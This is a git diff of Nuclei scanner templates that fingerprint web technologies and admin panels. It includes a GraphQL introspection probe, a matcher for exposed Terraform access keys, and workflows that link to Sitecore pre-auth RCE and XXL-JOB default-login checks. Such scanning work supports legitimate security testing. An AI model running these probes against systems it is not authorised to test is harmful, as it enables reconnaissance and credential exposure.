Content-Type: application/json
|
||||
|
||||
body: |
|
||||
{"query":"query IntrospectionQuery{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}"}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "Content-Type: application/json"
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "GraphQL introspection is not allowed by Apollo Server"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 400
|
|
@ -13,7 +13,7 @@ requests:
|
|||
- "{{BaseURL}}"
|
||||
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
max-redirects: 3
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: dsl
|
||||
|
|
|
@ -14,12 +14,15 @@ requests:
|
|||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"description" :"The Pega API'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'application/json'
|
||||
part: header
|
||||
|
|
|
@ -29,4 +29,4 @@ requests:
|
|||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- 'PHP\-Proxy<\/a> ([0-9.]+)<\/div>'
|
||||
- '<meta name="version" content="([0-9.]+)">'
|
||||
|
|
|
@ -16,9 +16,9 @@ requests:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- default
|
||||
- my_id
|
||||
- root_url
|
||||
- "default"
|
||||
- "my_id"
|
||||
- "root_url"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
|
|
|
@ -18,6 +18,7 @@ requests:
|
|||
- "<title>Ticket BBCode editor - SCEditor</title>"
|
||||
- 'title="SCEditor"'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
|
|
@ -1,21 +0,0 @@
|
|||
id: seeddms-detect
|
||||
info:
|
||||
name: Seeddms-
|
||||
author: pussycat0x
|
||||
severity: info
|
||||
tags: tech
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php"
|
||||
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<title>SeedDMS: Sign in</title>"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -5,10 +5,10 @@ info:
|
|||
author: cyllective
|
||||
severity: info
|
||||
description: Detects Shopware CMS
|
||||
tags: tech,shopware,cms
|
||||
reference:
|
||||
- https://github.com/shopware/shopware
|
||||
- https://github.com/shopware/platform
|
||||
tags: tech,shopware,cms
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -16,12 +16,17 @@ requests:
|
|||
- "{{BaseURL}}/admin"
|
||||
- "{{BaseURL}}/backend"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
condition: or
|
||||
words:
|
||||
- 'Realisiert mit Shopware'
|
||||
- 'Realised with Shopware'
|
||||
- 'Shopware Administration (c) shopware AG'
|
||||
- '<title>Shopware 5 - Backend (c) shopware AG</title>'
|
||||
- '<title>Shopware 5 - Backend (c) shopware AG</title>'
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,22 +1,32 @@
|
|||
id: strapi-cms-detect
|
||||
|
||||
info:
|
||||
name: strapi CMS detect
|
||||
author: cyllective
|
||||
name: Strapi CMS detect
|
||||
author: cyllective,daffainfo
|
||||
severity: info
|
||||
description: Detects strapi CMS
|
||||
description: Open source Node.js Headless CMS to easily build customisable APIs
|
||||
reference: https://github.com/strapi/strapi
|
||||
tags: tech,strapi,cms
|
||||
reference:
|
||||
- https://github.com/strapi/strapi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/admin/auth/login"
|
||||
- "{{BaseURL}}/admin/init"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
condition: or
|
||||
words:
|
||||
- '<title>Strapi Admin</title>'
|
||||
- '"data"'
|
||||
- '"uuid"'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- '"strapiVersion":"([0-9.]+)"'
|
|
@ -3117,6 +3117,12 @@ requests:
|
|||
|
||||
- type: word
|
||||
name: thinkphp
|
||||
part: header
|
||||
words:
|
||||
- "ThinkPHP"
|
||||
part: header
|
||||
|
||||
- type: word
|
||||
name: apollo
|
||||
part: body
|
||||
words:
|
||||
- "initApollo)(i.ApolloTargetServer.Self)"
|
||||
|
|
|
@ -17,8 +17,8 @@ requests:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- access_key
|
||||
- terraform
|
||||
- "access_key"
|
||||
- "terraform"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
|
|
|
@ -1,10 +1,10 @@
|
|||
id: thinkcmf-detection
|
||||
|
||||
info:
|
||||
name: ThinkCMF Detection
|
||||
author: pikpikcu
|
||||
name: Detect ThinkCMF
|
||||
author: pikpikcu,daffainfo
|
||||
severity: info
|
||||
tags: thinkcmf
|
||||
tags: panel,thinkcmf,login
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -13,12 +13,10 @@ requests:
|
|||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "X-Powered-By: ThinkCMF"
|
||||
part: header
|
||||
condition: and
|
||||
- '<meta name="author" content="ThinkCMF">'
|
||||
|
||||
- type: status
|
||||
status:
|
|
@ -1,24 +0,0 @@
|
|||
id: voipmonitor-detect
|
||||
|
||||
info:
|
||||
name: VoipMonitor detect
|
||||
author: Yanyun
|
||||
severity: info
|
||||
tags: tech,voipmonitor
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- 'share.voipmonitor.org'
|
||||
- 'VoIPmonitor'
|
||||
condition: and
|
|
@ -1,25 +0,0 @@
|
|||
id: wazuh-detect
|
||||
|
||||
info:
|
||||
name: wazuh detect
|
||||
author: cyllective
|
||||
severity: info
|
||||
description: Detects wazuh
|
||||
tags: tech,wazuh
|
||||
reference:
|
||||
- https://github.com/wazuh/wazuh
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/app/login"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
condition: or
|
||||
words:
|
||||
- '"id":"wazuh"'
|
||||
- '"title":"Wazuh"'
|
||||
- '"icon":"plugins/wazuh/img/icon_blue.png"'
|
||||
- '"url":"/app/wazuh"'
|
|
@ -1,21 +0,0 @@
|
|||
id: webmodule-ee-detection
|
||||
info:
|
||||
name: Webmodule Detection
|
||||
author: pussycat0x
|
||||
severity: info
|
||||
reference: https://www.exploit-db.com/ghdb/7001
|
||||
tags: webmodule-ee,tech
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/webmodule-ee/login.seam"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<title>Webmodule</title>"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -10,6 +10,7 @@ requests:
|
|||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/console"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
|
|
|
@ -11,14 +11,15 @@ requests:
|
|||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "Set-Cookie: wondercms_"
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Powered by WonderCMS"
|
||||
- "https://www.wondercms.com"
|
||||
condition: and
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
|
|
@ -13,11 +13,12 @@ requests:
|
|||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Powered by wuzhicms"
|
||||
- "五指CMS"
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -1,23 +0,0 @@
|
|||
id: xxljob-admin-detect
|
||||
|
||||
info:
|
||||
name: XXLJOB Admin Login
|
||||
author: pdteam
|
||||
severity: info
|
||||
tags: tech,xxljob
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/xxl-job-admin/toLogin"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "<a><b>XXL</b>JOB</a>"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -4,6 +4,8 @@ info:
|
|||
name: YApi Detect
|
||||
author: pikpikcu
|
||||
severity: info
|
||||
metadata:
|
||||
shodan-query: http.title:"YApi"
|
||||
tags: tech,yapi
|
||||
|
||||
requests:
|
||||
|
@ -13,7 +15,6 @@ requests:
|
|||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
|
|
|
@ -6,6 +6,6 @@ info:
|
|||
description: A simple workflow that runs all OpenAM related nuclei templates on a given target.
|
||||
|
||||
workflows:
|
||||
- template: technologies/openam-detect.yaml
|
||||
- template: exposed-panels/openam-panel.yaml
|
||||
subtemplates:
|
||||
- tags: openam
|
||||
|
|
|
@ -6,6 +6,6 @@ info:
|
|||
description: A simple workflow that runs all OpenSIS related nuclei templates on a given target.
|
||||
|
||||
workflows:
|
||||
- template: technologies/opensis-detect.yaml
|
||||
- template: exposed-panels/opensis-panel.yaml
|
||||
subtemplates:
|
||||
- tags: opensis
|
||||
|
|
|
@ -6,6 +6,6 @@ info:
|
|||
description: A simple workflow that runs all PhpCollab related nuclei templates on a given target.
|
||||
|
||||
workflows:
|
||||
- template: technologies/phpcollab-detect.yaml
|
||||
- template: exposed-panels/phpcollab-panel.yaml
|
||||
subtemplates:
|
||||
- tags: phpcollab
|
||||
|
|
|
@ -6,8 +6,6 @@ info:
|
|||
description: A simple workflow that runs all SiteCore related nuclei templates on a given target.
|
||||
|
||||
workflows:
|
||||
- template: technologies/sitecore-default-page.yaml
|
||||
- template: exposed-panels/sitecore-login.yaml
|
||||
- template: technologies/default-sitecore-page.yaml
|
||||
subtemplates:
|
||||
- tags: vulnerabilities/sitecore-pre-auth-rce.yaml
|
||||
- template: misconfiguration/sitecore-debug-page.yaml
|
||||
- tags: sitecore
|
|
@ -5,6 +5,6 @@ info:
|
|||
description: A simple workflow that runs all ThinkCMF related nuclei templates on a given target.
|
||||
|
||||
workflows:
|
||||
- template: technologies/thinkcmf-detection.yaml
|
||||
- template: technologies/thinkcmf-detect.yaml
|
||||
subtemplates:
|
||||
- tags: thinkcmf
|
|
@ -6,6 +6,6 @@ info:
|
|||
description: A simple workflow that runs all VMware Pipeline related nuclei templates on a given target.
|
||||
|
||||
workflows:
|
||||
- template: technologies/vmware-detect.yaml
|
||||
- template: technologies/vmware/vmware-detect.yaml
|
||||
subtemplates:
|
||||
- tags: vmware
|
||||
|
|
|
@ -6,6 +6,6 @@ info:
|
|||
description: A simple workflow that runs all VoipMonitor related nuclei templates on a given target.
|
||||
|
||||
workflows:
|
||||
- template: technologies/voipmonitor-detect.yaml
|
||||
- template: exposed-panels/voipmonitor-panel.yaml
|
||||
subtemplates:
|
||||
- tags: voipmonitor
|
||||
|
|
|
@ -6,6 +6,6 @@ info:
|
|||
description: A simple workflow that runs all XXL-JOB related nuclei templates on a given target.
|
||||
|
||||
workflows:
|
||||
- template: technologies/xxljob-admin-detect.yaml
|
||||
- template: exposed-panels/xxljob-panel.yaml
|
||||
subtemplates:
|
||||
- template: default-logins/xxljob/xxljob-default-login.yaml
|
||||
|
|
Loading…
Reference in New Issue